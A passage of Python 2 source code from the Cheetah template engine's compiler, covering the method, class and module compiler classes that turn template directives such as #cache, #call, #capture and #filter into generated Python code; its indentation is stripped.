self.startCacheRegion(cacheInfo, lineCol, rawPlaceholder=rawPlaceholder)
if self.isErrorCatcherOn():
methodName = self._classCompiler.addErrorCatcherCall(
expr, rawCode=rawPlaceholder, lineCol=lineCol)
expr = 'self.' + methodName + '(localsDict=locals())'
if silentMode:
self.addChunk('try:')
self.indent()
self.addFilteredChunk(expr, filterArgs, rawPlaceholder, lineCol=lineCol)
self.dedent()
self.addChunk('except NotFound: pass')
else:
self.addFilteredChunk(expr, filterArgs, rawPlaceholder, lineCol=lineCol)
if self.setting('outputRowColComments'):
self.appendToPrevChunk(' # from line %s, col %s' % lineCol + '.')
if cacheInfo:
self.endCacheRegion()
def addSilent(self, expr):
self.addChunk( expr )
def addEcho(self, expr, rawExpr=None):
self.addFilteredChunk(expr, rawExpr=rawExpr)
def addSet(self, expr, exprComponents, setStyle):
if setStyle is SET_GLOBAL:
(LVALUE, OP, RVALUE) = (exprComponents.LVALUE,
exprComponents.OP,
exprComponents.RVALUE)
# we need to split the LVALUE to deal with globalSetVars
splitPos1 = LVALUE.find('.')
splitPos2 = LVALUE.find('[')
if splitPos1 > 0 and splitPos2==-1:
splitPos = splitPos1
elif splitPos1 > 0 and splitPos1 < max(splitPos2,0):
splitPos = splitPos1
else:
splitPos = splitPos2
if splitPos >0:
primary = LVALUE[:splitPos]
secondary = LVALUE[splitPos:]
else:
primary = LVALUE
secondary = ''
LVALUE = 'self._CHEETAH__globalSetVars["' + primary + '"]' + secondary
expr = LVALUE + ' ' + OP + ' ' + RVALUE.strip()
if setStyle is SET_MODULE:
self._moduleCompiler.addModuleGlobal(expr)
else:
self.addChunk(expr)
def addInclude(self, sourceExpr, includeFrom, isRaw):
self.addChunk('self._handleCheetahInclude(' + sourceExpr +
', trans=trans, ' +
'includeFrom="' + includeFrom + '", raw=' +
repr(isRaw) + ')')
def addWhile(self, expr, lineCol=None):
self.addIndentingDirective(expr, lineCol=lineCol)
def addFor(self, expr, lineCol=None):
self.addIndentingDirective(expr, lineCol=lineCol)
def addRepeat(self, expr, lineCol=None):
#the _repeatCount stuff here allows nesting of #repeat directives
self._repeatCount = getattr(self, "_repeatCount", -1) + 1
self.addFor('for __i%s in range(%s)' % (self._repeatCount,expr), lineCol=lineCol)
def addIndentingDirective(self, expr, lineCol=None):
if expr and not expr[-1] == ':':
expr = expr + ':'
self.addChunk( expr )
if lineCol:
self.appendToPrevChunk(' # generated from line %s, col %s'%lineCol )
self.indent()
def addReIndentingDirective(self, expr, dedent=True, lineCol=None):
self.commitStrConst()
if dedent:
self.dedent()
if not expr[-1] == ':':
expr = expr + ':'
self.addChunk( expr )
if lineCol:
self.appendToPrevChunk(' # generated from line %s, col %s'%lineCol )
self.indent()
def addIf(self, expr, lineCol=None):
"""For a full #if ... #end if directive
"""
self.addIndentingDirective(expr, lineCol=lineCol)
def addOneLineIf(self, expr, lineCol=None):
"""For a full #if ... #end if directive
"""
self.addIndentingDirective(expr, lineCol=lineCol)
def addTernaryExpr(self, conditionExpr, trueExpr, falseExpr, lineCol=None):
"""For a single-lie #if ... then .... else ... directive
<condition> then <trueExpr> else <falseExpr>
"""
self.addIndentingDirective(conditionExpr, lineCol=lineCol)
self.addFilteredChunk(trueExpr)
self.dedent()
self.addIndentingDirective('else')
self.addFilteredChunk(falseExpr)
self.dedent()
def addElse(self, expr, dedent=True, lineCol=None):
expr = re.sub(r'else[ \f\t]+if','elif', expr)
self.addReIndentingDirective(expr, dedent=dedent, lineCol=lineCol)
def addElif(self, expr, dedent=True, lineCol=None):
self.addElse(expr, dedent=dedent, lineCol=lineCol)
def addUnless(self, expr, lineCol=None):
self.addIf('if not (' + expr + ')')
def addClosure(self, functionName, argsList, parserComment):
argStringChunks = []
for arg in argsList:
chunk = arg[0]
if not arg[1] == None:
chunk += '=' + arg[1]
argStringChunks.append(chunk)
signature = "def " + functionName + "(" + ','.join(argStringChunks) + "):"
self.addIndentingDirective(signature)
self.addChunk('#'+parserComment)
def addTry(self, expr, lineCol=None):
self.addIndentingDirective(expr, lineCol=lineCol)
def addExcept(self, expr, dedent=True, lineCol=None):
self.addReIndentingDirective(expr, dedent=dedent, lineCol=lineCol)
def addFinally(self, expr, dedent=True, lineCol=None):
self.addReIndentingDirective(expr, dedent=dedent, lineCol=lineCol)
def addReturn(self, expr):
assert not self._isGenerator
self.addChunk(expr)
self._hasReturnStatement = True
def addYield(self, expr):
assert not self._hasReturnStatement
self._isGenerator = True
if expr.replace('yield','').strip():
self.addChunk(expr)
else:
self.addChunk('if _dummyTrans:')
self.indent()
self.addChunk('yield trans.response().getvalue()')
self.addChunk('trans = DummyTransaction()')
self.addChunk('write = trans.response().write')
self.dedent()
self.addChunk('else:')
self.indent()
self.addChunk(
'raise TypeError("This method cannot be called with a trans arg")')
self.dedent()
def addPass(self, expr):
self.addChunk(expr)
def addDel(self, expr):
self.addChunk(expr)
def addAssert(self, expr):
self.addChunk(expr)
def addRaise(self, expr):
self.addChunk(expr)
def addBreak(self, expr):
self.addChunk(expr)
def addContinue(self, expr):
self.addChunk(expr)
def addPSP(self, PSP):
self.commitStrConst()
autoIndent = False
if PSP[0] == '=':
PSP = PSP[1:]
if PSP:
self.addWriteChunk('_filter(' + PSP + ')')
return
elif PSP.lower() == 'end':
self.dedent()
return
elif PSP[-1] == '$':
autoIndent = True
PSP = PSP[:-1]
elif PSP[-1] == ':':
autoIndent = True
for line in PSP.splitlines():
self.addChunk(line)
if autoIndent:
self.indent()
def nextCacheID(self):
return ('_'+str(random.randrange(100, 999))
+ str(random.randrange(10000, 99999)))
def startCacheRegion(self, cacheInfo, lineCol, rawPlaceholder=None):
# @@TR: we should add some runtime logging to this
ID = self.nextCacheID()
interval = cacheInfo.get('interval',None)
test = cacheInfo.get('test',None)
customID = cacheInfo.get('id',None)
if customID:
ID = customID
varyBy = cacheInfo.get('varyBy', repr(ID))
self._cacheRegionsStack.append(ID) # attrib of current methodCompiler
# @@TR: add this to a special class var as well
self.addChunk('')
self.addChunk('## START CACHE REGION: ID='+ID+
'. line %s, col %s'%lineCol + ' in the source.')
self.addChunk('_RECACHE_%(ID)s = False'%locals())
self.addChunk('_cacheRegion_%(ID)s = self.getCacheRegion(regionID='%locals()
+ repr(ID)
+ ', cacheInfo=%r'%cacheInfo
+ ')')
self.addChunk('if _cacheRegion_%(ID)s.isNew():'%locals())
self.indent()
self.addChunk('_RECACHE_%(ID)s = True'%locals())
self.dedent()
self.addChunk('_cacheItem_%(ID)s = _cacheRegion_%(ID)s.getCacheItem('%locals()
+varyBy+')')
self.addChunk('if _cacheItem_%(ID)s.hasExpired():'%locals())
self.indent()
self.addChunk('_RECACHE_%(ID)s = True'%locals())
self.dedent()
if test:
self.addChunk('if ' + test + ':')
self.indent()
self.addChunk('_RECACHE_%(ID)s = True'%locals())
self.dedent()
self.addChunk('if (not _RECACHE_%(ID)s) and _cacheItem_%(ID)s.getRefreshTime():'%locals())
self.indent()
#self.addChunk('print "DEBUG"+"-"*50')
self.addChunk('try:')
self.indent()
self.addChunk('_output = _cacheItem_%(ID)s.renderOutput()'%locals())
self.dedent()
self.addChunk('except KeyError:')
self.indent()
self.addChunk('_RECACHE_%(ID)s = True'%locals())
#self.addChunk('print "DEBUG"+"*"*50')
self.dedent()
self.addChunk('else:')
self.indent()
self.addWriteChunk('_output')
self.addChunk('del _output')
self.dedent()
self.dedent()
self.addChunk('if _RECACHE_%(ID)s or not _cacheItem_%(ID)s.getRefreshTime():'%locals())
self.indent()
self.addChunk('_orig_trans%(ID)s = trans'%locals())
self.addChunk('trans = _cacheCollector_%(ID)s = DummyTransaction()'%locals())
self.addChunk('write = _cacheCollector_%(ID)s.response().write'%locals())
if interval:
self.addChunk(("_cacheItem_%(ID)s.setExpiryTime(currentTime() +"%locals())
+ str(interval) + ")")
def endCacheRegion(self):
ID = self._cacheRegionsStack.pop()
self.addChunk('trans = _orig_trans%(ID)s'%locals())
self.addChunk('write = trans.response().write')
self.addChunk('_cacheData = _cacheCollector_%(ID)s.response().getvalue()'%locals())
self.addChunk('_cacheItem_%(ID)s.setData(_cacheData)'%locals())
self.addWriteChunk('_cacheData')
self.addChunk('del _cacheData')
self.addChunk('del _cacheCollector_%(ID)s'%locals())
self.addChunk('del _orig_trans%(ID)s'%locals())
self.dedent()
self.addChunk('## END CACHE REGION: '+ID)
self.addChunk('')
def nextCallRegionID(self):
return self.nextCacheID()
def startCallRegion(self, functionName, args, lineCol, regionTitle='CALL'):
class CallDetails: pass
callDetails = CallDetails()
callDetails.ID = ID = self.nextCallRegionID()
callDetails.functionName = functionName
callDetails.args = args
callDetails.lineCol = lineCol
callDetails.usesKeywordArgs = False
self._callRegionsStack.append((ID, callDetails)) # attrib of current methodCompiler
self.addChunk('## START %(regionTitle)s REGION: '%locals()
+ID
+' of '+functionName
+' at line %s, col %s'%lineCol + ' in the source.')
self.addChunk('_orig_trans%(ID)s = trans'%locals())
self.addChunk('_wasBuffering%(ID)s = self._CHEETAH__isBuffering'%locals())
self.addChunk('self._CHEETAH__isBuffering = True')
self.addChunk('trans = _callCollector%(ID)s = DummyTransaction()'%locals())
self.addChunk('write = _callCollector%(ID)s.response().write'%locals())
def setCallArg(self, argName, lineCol):
ID, callDetails = self._callRegionsStack[-1]
if callDetails.usesKeywordArgs:
self._endCallArg()
else:
callDetails.usesKeywordArgs = True
self.addChunk('_callKws%(ID)s = {}'%locals())
self.addChunk('_currentCallArgname%(ID)s = %(argName)r'%locals())
callDetails.currentArgname = argName
def _endCallArg(self):
ID, callDetails = self._callRegionsStack[-1]
currCallArg = callDetails.currentArgname
self.addChunk(('_callKws%(ID)s[%(currCallArg)r] ='
' _callCollector%(ID)s.response().getvalue()')%locals())
self.addChunk('del _callCollector%(ID)s'%locals())
self.addChunk('trans = _callCollector%(ID)s = DummyTransaction()'%locals())
self.addChunk('write = _callCollector%(ID)s.response().write'%locals())
def endCallRegion(self, regionTitle='CALL'):
ID, callDetails = self._callRegionsStack[-1]
functionName, initialKwArgs, lineCol = (
callDetails.functionName, callDetails.args, callDetails.lineCol)
def reset(ID=ID):
self.addChunk('trans = _orig_trans%(ID)s'%locals())
self.addChunk('write = trans.response().write')
self.addChunk('self._CHEETAH__isBuffering = _wasBuffering%(ID)s '%locals())
self.addChunk('del _wasBuffering%(ID)s'%locals())
self.addChunk('del _orig_trans%(ID)s'%locals())
if not callDetails.usesKeywordArgs:
reset()
self.addChunk('_callArgVal%(ID)s = _callCollector%(ID)s.response().getvalue()'%locals())
self.addChunk('del _callCollector%(ID)s'%locals())
if initialKwArgs:
initialKwArgs = ', '+initialKwArgs
self.addFilteredChunk('%(functionName)s(_callArgVal%(ID)s%(initialKwArgs)s)'%locals())
self.addChunk('del _callArgVal%(ID)s'%locals())
else:
if initialKwArgs:
initialKwArgs = initialKwArgs+', '
self._endCallArg()
reset()
self.addFilteredChunk('%(functionName)s(%(initialKwArgs)s**_callKws%(ID)s)'%locals())
self.addChunk('del _callKws%(ID)s'%locals())
self.addChunk('## END %(regionTitle)s REGION: '%locals()
+ID
+' of '+functionName
+' at line %s, col %s'%lineCol + ' in the source.')
self.addChunk('')
self._callRegionsStack.pop() # attrib of current methodCompiler
def nextCaptureRegionID(self):
return self.nextCacheID()
def startCaptureRegion(self, assignTo, lineCol):
class CaptureDetails: pass
captureDetails = CaptureDetails()
captureDetails.ID = ID = self.nextCaptureRegionID()
captureDetails.assignTo = assignTo
captureDetails.lineCol = lineCol
self._captureRegionsStack.append((ID,captureDetails)) # attrib of current methodCompiler
self.addChunk('## START CAPTURE REGION: '+ID
+' '+assignTo
+' at line %s, col %s'%lineCol + ' in the source.')
self.addChunk('_orig_trans%(ID)s = trans'%locals())
self.addChunk('_wasBuffering%(ID)s = self._CHEETAH__isBuffering'%locals())
self.addChunk('self._CHEETAH__isBuffering = True')
self.addChunk('trans = _captureCollector%(ID)s = DummyTransaction()'%locals())
self.addChunk('write = _captureCollector%(ID)s.response().write'%locals())
def endCaptureRegion(self):
ID, captureDetails = self._captureRegionsStack.pop()
assignTo, lineCol = (captureDetails.assignTo, captureDetails.lineCol)
self.addChunk('trans = _orig_trans%(ID)s'%locals())
self.addChunk('write = trans.response().write')
self.addChunk('self._CHEETAH__isBuffering = _wasBuffering%(ID)s '%locals())
self.addChunk('%(assignTo)s = _captureCollector%(ID)s.response().getvalue()'%locals())
self.addChunk('del _orig_trans%(ID)s'%locals())
self.addChunk('del _captureCollector%(ID)s'%locals())
self.addChunk('del _wasBuffering%(ID)s'%locals())
def setErrorCatcher(self, errorCatcherName):
self.turnErrorCatcherOn()
self.addChunk('if self._CHEETAH__errorCatchers.has_key("' + errorCatcherName + '"):')
self.indent()
self.addChunk('self._CHEETAH__errorCatcher = self._CHEETAH__errorCatchers["' +
errorCatcherName + '"]')
self.dedent()
self.addChunk('else:')
self.indent()
self.addChunk('self._CHEETAH__errorCatcher = self._CHEETAH__errorCatchers["'
+ errorCatcherName + '"] = ErrorCatchers.'
+ errorCatcherName + '(self)'
)
self.dedent()
def nextFilterRegionID(self):
return self.nextCacheID()
def setFilter(self, theFilter, isKlass):
class FilterDetails: pass
filterDetails = FilterDetails()
filterDetails.ID = ID = self.nextFilterRegionID()
filterDetails.theFilter = theFilter
filterDetails.isKlass = isKlass
self._filterRegionsStack.append((ID, filterDetails)) # attrib of current methodCompiler
self.addChunk('_orig_filter%(ID)s = _filter'%locals())
if isKlass:
self.addChunk('_filter = self._CHEETAH__currentFilter = ' + theFilter.strip() +
'(self).filter')
else:
if theFilter.lower() == 'none':
self.addChunk('_filter = self._CHEETAH__initialFilter')
else:
# is string representing the name of a builtin filter
self.addChunk('filterName = ' + repr(theFilter))
self.addChunk('if self._CHEETAH__filters.has_key("' + theFilter + '"):')
self.indent()
self.addChunk('_filter = self._CHEETAH__currentFilter = self._CHEETAH__filters[filterName]')
self.dedent()
self.addChunk('else:')
self.indent()
self.addChunk('_filter = self._CHEETAH__currentFilter'
+' = \\\n\t\t\tself._CHEETAH__filters[filterName] = '
+ 'getattr(self._CHEETAH__filtersLib, filterName)(self).filter')
self.dedent()
def closeFilterBlock(self):
ID, filterDetails = self._filterRegionsStack.pop()
#self.addChunk('_filter = self._CHEETAH__initialFilter')
self.addChunk('_filter = _orig_filter%(ID)s'%locals())
class AutoMethodCompiler(MethodCompiler):
def _setupState(self):
MethodCompiler._setupState(self)
self._argStringList = [ ("self",None) ]
self._streamingEnabled = True
def _useKWsDictArgForPassingTrans(self):
alreadyHasTransArg = [argname for argname,defval in self._argStringList
if argname=='trans']
return (self.methodName()!='respond'
and not alreadyHasTransArg
and self.setting('useKWsDictArgForPassingTrans'))
def cleanupState(self):
MethodCompiler.cleanupState(self)
self.commitStrConst()
if self._cacheRegionsStack:
self.endCacheRegion()
if self._callRegionsStack:
self.endCallRegion()
if self._streamingEnabled:
kwargsName = None
positionalArgsListName = None
for argname,defval in self._argStringList:
if argname.strip().startswith('**'):
kwargsName = argname.strip().replace('**','')
break
elif argname.strip().startswith('*'):
positionalArgsListName = argname.strip().replace('*','')
if not kwargsName and self._useKWsDictArgForPassingTrans():
kwargsName = 'KWS'
self.addMethArg('**KWS', None)
self._kwargsName = kwargsName
if not self._useKWsDictArgForPassingTrans():
if not kwargsName and not positionalArgsListName:
self.addMethArg('trans', 'None')
else:
self._streamingEnabled = False
self._indentLev = self.setting('initialMethIndentLevel')
mainBodyChunks = self._methodBodyChunks
self._methodBodyChunks = []
self._addAutoSetupCode()
self._methodBodyChunks.extend(mainBodyChunks)
self._addAutoCleanupCode()
def _addAutoSetupCode(self):
if self._initialMethodComment:
self.addChunk(self._initialMethodComment)
if self._streamingEnabled:
if self._useKWsDictArgForPassingTrans() and self._kwargsName:
self.addChunk('trans = %s.get("trans")'%self._kwargsName)
self.addChunk('if (not trans and not self._CHEETAH__isBuffering'
' and not callable(self.transaction)):')
self.indent()
self.addChunk('trans = self.transaction'
' # is None unless self.awake() was called')
self.dedent()
self.addChunk('if not trans:')
self.indent()
self.addChunk('trans = DummyTransaction()')
if self.setting('autoAssignDummyTransactionToSelf'):
self.addChunk('self.transaction = trans')
self.addChunk('_dummyTrans = True')
self.dedent()
self.addChunk('else: _dummyTrans = False')
else:
self.addChunk('trans = DummyTransaction()')
self.addChunk('_dummyTrans = True')
self.addChunk('write = trans.response().write')
if self.setting('useNameMapper'):
argNames = [arg[0] for arg in self._argStringList]
allowSearchListAsMethArg = self.setting('allowSearchListAsMethArg')
if allowSearchListAsMethArg and 'SL' in argNames:
pass
elif allowSearchListAsMethArg and 'searchList' in argNames:
self.addChunk('SL = searchList')
else:
self.addChunk('SL = self._CHEETAH__searchList')
if self.setting('useFilters'):
self.addChunk('_filter = self._CHEETAH__currentFilter')
self.addChunk('')
self.addChunk("#" *40)
self.addChunk('## START - generated method body')
self.addChunk('')
def _addAutoCleanupCode(self):
self.addChunk('')
self.addChunk("#" *40)
self.addChunk('## END - generated method body')
self.addChunk('')
if not self._isGenerator:
self.addStop()
self.addChunk('')
def addStop(self, expr=None):
self.addChunk('return _dummyTrans and trans.response().getvalue() or ""')
def addMethArg(self, name, defVal=None):
self._argStringList.append( (name,defVal) )
def methodSignature(self):
argStringChunks = []
for arg in self._argStringList:
chunk = arg[0]
if not arg[1] == None:
chunk += '=' + arg[1]
argStringChunks.append(chunk)
argString = (', ').join(argStringChunks)
output = []
if self._decorator:
output.append(self._indent + self._decorator+'\n')
output.append(self._indent + "def "
+ self.methodName() + "(" +
argString + "):\n\n")
return ''.join(output)
##################################################
## CLASS COMPILERS
_initMethod_initCheetah = """\
if not self._CHEETAH__instanceInitialized:
cheetahKWArgs = {}
allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split()
for k,v in KWs.items():
if k in allowedKWs: cheetahKWArgs[k] = v
self._initCheetahInstance(**cheetahKWArgs)
""".replace('\n','\n'+' '*8)
class ClassCompiler(GenUtils):
methodCompilerClass = AutoMethodCompiler
methodCompilerClassForInit = MethodCompiler
def __init__(self, className, mainMethodName='respond',
moduleCompiler=None,
fileName=None,
settingsManager=None):
self._settingsManager = settingsManager
self._fileName = fileName
self._className = className
self._moduleCompiler = moduleCompiler
self._mainMethodName = mainMethodName
self._setupState()
methodCompiler = self._spawnMethodCompiler(
mainMethodName,
initialMethodComment='## CHEETAH: main method generated for this template')
self._setActiveMethodCompiler(methodCompiler)
if fileName and self.setting('monitorSrcFile'):
self._addSourceFileMonitoring(fileName)
def setting(self, key):
return self._settingsManager.setting(key)
def __getattr__(self, name):
"""Provide access to the methods and attributes of the MethodCompiler
at the top of the activeMethods stack: one-way namespace sharing
WARNING: Use .setMethods to assign the attributes of the MethodCompiler
from the methods of this class!!! or you will be assigning to attributes
of this object instead."""
if self.__dict__.has_key(name):
return self.__dict__[name]
elif hasattr(self.__class__, name):
return getattr(self.__class__, name)
elif self._activeMethodsList and hasattr(self._activeMethodsList[-1], name):
return getattr(self._activeMethodsList[-1], name)
else:
raise AttributeError, name
def _setupState(self):
self._classDef = None
self._decoratorForNextMethod = None
self._activeMethodsList = [] # stack while parsing/generating
self._finishedMethodsList = [] # store by order
self._methodsIndex = {} # store by name
self._baseClass = 'Template'
self._classDocStringLines = []
# printed after methods in the gen class def:
self._generatedAttribs = ['_CHEETAH__instanceInitialized = False']
self._generatedAttribs.append('_CHEETAH_version = __CHEETAH_version__')
self._generatedAttribs.append(
'_CHEETAH_versionTuple = __CHEETAH_versionTuple__')
self._generatedAttribs.append('_CHEETAH_genTime = __CHEETAH_genTime__')
self._generatedAttribs.append('_CHEETAH_genTimestamp = __CHEETAH_genTimestamp__')
self._generatedAttribs.append('_CHEETAH_src = __CHEETAH_src__')
self._generatedAttribs.append(
'_CHEETAH_srcLastModified = __CHEETAH_srcLastModified__')
if self.setting('templateMetaclass'):
self._generatedAttribs.append('__metaclass__ = '+self.setting('templateMetaclass'))
self._initMethChunks = []
self._blockMetaData = {}
self._errorCatcherCount = 0
self._placeholderToErrorCatcherMap = {}
def cleanupState(self):
while self._activeMethodsList:
methCompiler = self._popActiveMethodCompiler()
self._swallowMethodCompiler(methCompiler)
self._setupInitMethod()
if self._mainMethodName == 'respond':
if self.setting('setup__str__method'):
self._generatedAttribs.append('def __str__(self): return self.respond()')
self.addAttribute('_mainCheetahMethod_for_' + self._className +
'= ' + repr(self._mainMethodName) )
def _setupInitMethod(self):
__init__ = self._spawnMethodCompiler('__init__',
klass=self.methodCompilerClassForInit)
__init__.setMethodSignature("def __init__(self, *args, **KWs)")
__init__.addChunk("%s.__init__(self, *args, **KWs)" % self._baseClass)
__init__.addChunk(_initMethod_initCheetah%{'className':self._className})
for chunk in self._initMethChunks:
__init__.addChunk(chunk)
__init__.cleanupState()
self._swallowMethodCompiler(__init__, pos=0)
def _addSourceFileMonitoring(self, fileName):
# @@TR: this stuff needs auditing for Cheetah 2.0
# the first bit is added to init
self.addChunkToInit('self._filePath = ' + repr(fileName))
self.addChunkToInit('self._fileMtime = ' + str(getmtime(fileName)) )
# the rest is added to the main output method of the class ('mainMethod')
self.addChunk('if exists(self._filePath) and ' +
'getmtime(self._filePath) > self._fileMtime:')
self.indent()
self.addChunk('self._compile(file=self._filePath, moduleName='+className + ')')
self.addChunk(
'write(getattr(self, self._mainCheetahMethod_for_' + self._className +
')(trans=trans))')
self.addStop()
self.dedent()
def setClassName(self, name):
self._className = name
def className(self):
return self._className
def setBaseClass(self, baseClassName):
self._baseClass = baseClassName
def setMainMethodName(self, methodName):
if methodName == self._mainMethodName:
return
## change the name in the methodCompiler and add new reference
mainMethod = self._methodsIndex[self._mainMethodName]
mainMethod.setMethodName(methodName)
self._methodsIndex[methodName] = mainMethod
## make sure that fileUpdate code still works properly:
chunkToChange = ('write(self.' + self._mainMethodName + '(trans=trans))')
chunks = mainMethod._methodBodyChunks
if chunkToChange in chunks:
for i in range(len(chunks)):
if chunks[i] == chunkToChange:
chunks[i] = ('write(self.' + methodName + '(trans=trans))')
## get rid of the old reference and update self._mainMethodName
del self._methodsIndex[self._mainMethodName]
self._mainMethodName = methodName
def setMainMethodArgs(self, argsList):
mainMethodCompiler = self._methodsIndex[self._mainMethodName]
for argName, defVal in argsList:
mainMethodCompiler.addMethArg(argName, defVal)
def _spawnMethodCompiler(self, methodName, klass=None,
initialMethodComment=None):
if klass is None:
klass = self.methodCompilerClass
decorator = None
if self._decoratorForNextMethod:
decorator = self._decoratorForNextMethod
self._decoratorForNextMethod = None
methodCompiler = klass(methodName, classCompiler=self,
decorator=decorator,
initialMethodComment=initialMethodComment)
self._methodsIndex[methodName] = methodCompiler
return methodCompiler
def _setActiveMethodCompiler(self, methodCompiler):
self._activeMethodsList.append(methodCompiler)
def _getActiveMethodCompiler(self):
return self._activeMethodsList[-1]
def _popActiveMethodCompiler(self):
return self._activeMethodsList.pop()
def _swallowMethodCompiler(self, methodCompiler, pos=None):
methodCompiler.cleanupState()
if pos==None:
self._finishedMethodsList.append( methodCompiler )
else:
self._finishedMethodsList.insert(pos, methodCompiler)
return methodCompiler
def startMethodDef(self, methodName, argsList, parserComment):
methodCompiler = self._spawnMethodCompiler(
methodName, initialMethodComment=parserComment)
self._setActiveMethodCompiler(methodCompiler)
for argName, defVal in argsList:
methodCompiler.addMethArg(argName, defVal)
def _finishedMethods(self):
return self._finishedMethodsList
def addDecorator(self, decoratorExpr):
"""Set the decorator to be used with the next method in the source.
See _spawnMethodCompiler() and MethodCompiler for the details of how
this is used.
"""
self._decoratorForNextMethod = decoratorExpr
def addClassDocString(self, line):
self._classDocStringLines.append( line.replace('%','%%'))
def addChunkToInit(self,chunk):
self._initMethChunks.append(chunk)
def addAttribute(self, attribExpr):
## first test to make sure that the user hasn't used any fancy Cheetah syntax
# (placeholders, directives, etc.) inside the expression
if attribExpr.find('VFN(') != -1 or attribExpr.find('VFFSL(') != -1:
raise ParseError(self,
'Invalid #attr directive.' +
' It should only contain simple Python literals.')
## now add the attribute
self._generatedAttribs.append(attribExpr)
def addErrorCatcherCall(self, codeChunk, rawCode='', lineCol=''):
if self._placeholderToErrorCatcherMap.has_key(rawCode):
methodName = self._placeholderToErrorCatcherMap[rawCode]
if not self.setting('outputRowColComments'):
self._methodsIndex[methodName].addMethDocString(
'plus at line %s, col %s'%lineCol)
return methodName
self._errorCatcherCount += 1
methodName = '__errorCatcher' + str(self._errorCatcherCount)
self._placeholderToErrorCatcherMap[rawCode] = methodName
catcherMeth = self._spawnMethodCompiler(
methodName,
klass=MethodCompiler,
initialMethodComment=('## CHEETAH: Generated from ' + rawCode +
' at line %s, col %s'%lineCol + '.')
)
catcherMeth.setMethodSignature('def ' + methodName +
'(self, localsDict={})')
# is this use of localsDict right?
catcherMeth.addChunk('try:')
catcherMeth.indent()
catcherMeth.addChunk("return eval('''" + codeChunk +
"''', globals(), localsDict)")
catcherMeth.dedent()
catcherMeth.addChunk('except self._CHEETAH__errorCatcher.exceptions(), e:')
catcherMeth.indent()
catcherMeth.addChunk("return self._CHEETAH__errorCatcher.warn(exc_val=e, code= " +
repr(codeChunk) + " , rawCode= " +
repr(rawCode) + " , lineCol=" + str(lineCol) +")")
catcherMeth.cleanupState()
self._swallowMethodCompiler(catcherMeth)
return methodName
def closeDef(self):
self.commitStrConst()
methCompiler = self._popActiveMethodCompiler()
self._swallowMethodCompiler(methCompiler)
def closeBlock(self):
self.commitStrConst()
methCompiler = self._popActiveMethodCompiler()
methodName = methCompiler.methodName()
if self.setting('includeBlockMarkers'):
endMarker = self.setting('blockMarkerEnd')
methCompiler.addStrConst(endMarker[0] + methodName + endMarker[1])
self._swallowMethodCompiler(methCompiler)
#metaData = self._blockMetaData[methodName]
#rawDirective = metaData['raw']
#lineCol = metaData['lineCol']
## insert the code to call the block, caching if #cache directive is on
codeChunk = 'self.' + methodName + '(trans=trans)'
self.addChunk(codeChunk)
#self.appendToPrevChunk(' # generated from ' + repr(rawDirective) )
#if self.setting('outputRowColComments'):
# self.appendToPrevChunk(' at line %s, col %s' % lineCol + '.')
## code wrapping methods
def classDef(self):
if self._classDef:
return self._classDef
else:
return self.wrapClassDef()
__str__ = classDef
def wrapClassDef(self):
ind = self.setting('indentationStep')
classDefChunks = [self.classSignature(),
self.classDocstring(),
]
def addMethods():
classDefChunks.extend([
ind + '#'*50,
ind + '## CHEETAH GENERATED METHODS',
'\n',
self.methodDefs(),
])
def addAttributes():
classDefChunks.extend([
ind + '#'*50,
ind + '## CHEETAH GENERATED ATTRIBUTES',
'\n',
self.attributes(),
])
if self.setting('outputMethodsBeforeAttributes'):
addMethods()
addAttributes()
else:
addAttributes()
addMethods()
classDef = '\n'.join(classDefChunks)
self._classDef = classDef
return classDef
def classSignature(self):
return "class %s(%s):" % (self.className(), self._baseClass)
def classDocstring(self):
if not self._classDocStringLines:
return ''
ind = self.setting('indentationStep')
docStr = ('%(ind)s"""\n%(ind)s' +
'\n%(ind)s'.join(self._classDocStringLines) +
'\n%(ind)s"""\n'
) % {'ind':ind}
return docStr
def methodDefs(self):
methodDefs = [str(methGen) for methGen in self._finishedMethods() ]
return '\n\n'.join(methodDefs)
def attributes(self):
attribs = [self.setting('indentationStep') + str(attrib)
for attrib in self._generatedAttribs ]
return '\n\n'.join(attribs)
class AutoClassCompiler(ClassCompiler):
pass
##################################################
## MODULE COMPILERS
class ModuleCompiler(SettingsManager, GenUtils):
parserClass = Parser
classCompilerClass = AutoClassCompiler
def __init__(self, source=None, file=None,
moduleName='DynamicallyCompiledCheetahTemplate',
mainClassName=None, # string
mainMethodName=None, # string
baseclassName=None, # string
extraImportStatements=None, # list of strings
settings=None # dict
):
SettingsManager.__init__(self)
if settings:
self.updateSettings(settings)
# disable useStackFrames if the C version of NameMapper isn't compiled
# it's painfully slow in the Python version and bites Windows users all
# the time:
if not NameMapper.C_VERSION:
if not sys.platform.startswith('java'):
warnings.warn(
"\nYou don't have the C version of NameMapper installed! "
"I'm disabling Cheetah's useStackFrames option as it is "
"painfully slow with the Python version of NameMapper. "
"You should get a copy of Cheetah with the compiled C version of NameMapper."
)
self.setSetting('useStackFrames', False)
self._compiled = False
self._moduleName = moduleName
if not mainClassName:
self._mainClassName = moduleName
else:
self._mainClassName = mainClassName
self._mainMethodNameArg = mainMethodName
if mainMethodName:
self.setSetting('mainMethodName', mainMethodName)
self._baseclassName = baseclassName
self._filePath = None
self._fileMtime = None
if source and file:
raise TypeError("Cannot compile from a source string AND file.")
elif isinstance(file, types.StringType) or isinstance(file, types.UnicodeType): # it's a filename.
f = open(file) # Raises IOError.
source = f.read()
f.close()
self._filePath = file
self._fileMtime = os.path.getmtime(file)
elif hasattr(file, 'read'):
source = file.read() # Can't set filename or mtime--they're not accessible.
elif file:
raise TypeError("'file' argument must be a filename string or file-like object")
if self._filePath:
self._fileDirName, self._fileBaseName = os.path.split(self._filePath)
self._fileBaseNameRoot, self._fileBaseNameExt = \
os.path.splitext(self._fileBaseName)
if not (isinstance(source, str) or isinstance(source, unicode)):
source = str( source )
# by converting to string here we allow objects such as other Templates
# to be passed in
# Handle the #indent directive by converting it to other directives.
# (Over the long term we'll make it a real directive.)
if source == "":
warnings.warn("You supplied an empty string for the source!", )
if source.find('#indent') != -1: #@@TR: undocumented hack
source = indentize(source)
self._parser = self.parserClass(source, filename=self._filePath, compiler=self)
self._setupCompilerState()
def __getattr__(self, name):
"""Provide one-way access to the methods and attributes of the
ClassCompiler, and thereby the MethodCompilers as well.
WARNING: Use .setMethods to assign the attributes of the ClassCompiler
from the methods of this class!!! or you will be assigning to attributes
of this object instead.
"""
if self.__dict__.has_key(name):
return self.__dict__[name]
elif hasattr(self.__class__, name):
return getattr(self.__class__, name)
elif self._activeClassesList and hasattr(self._activeClassesList[-1], name):
return getattr(self._activeClassesList[-1], name)
else:
raise AttributeError, name
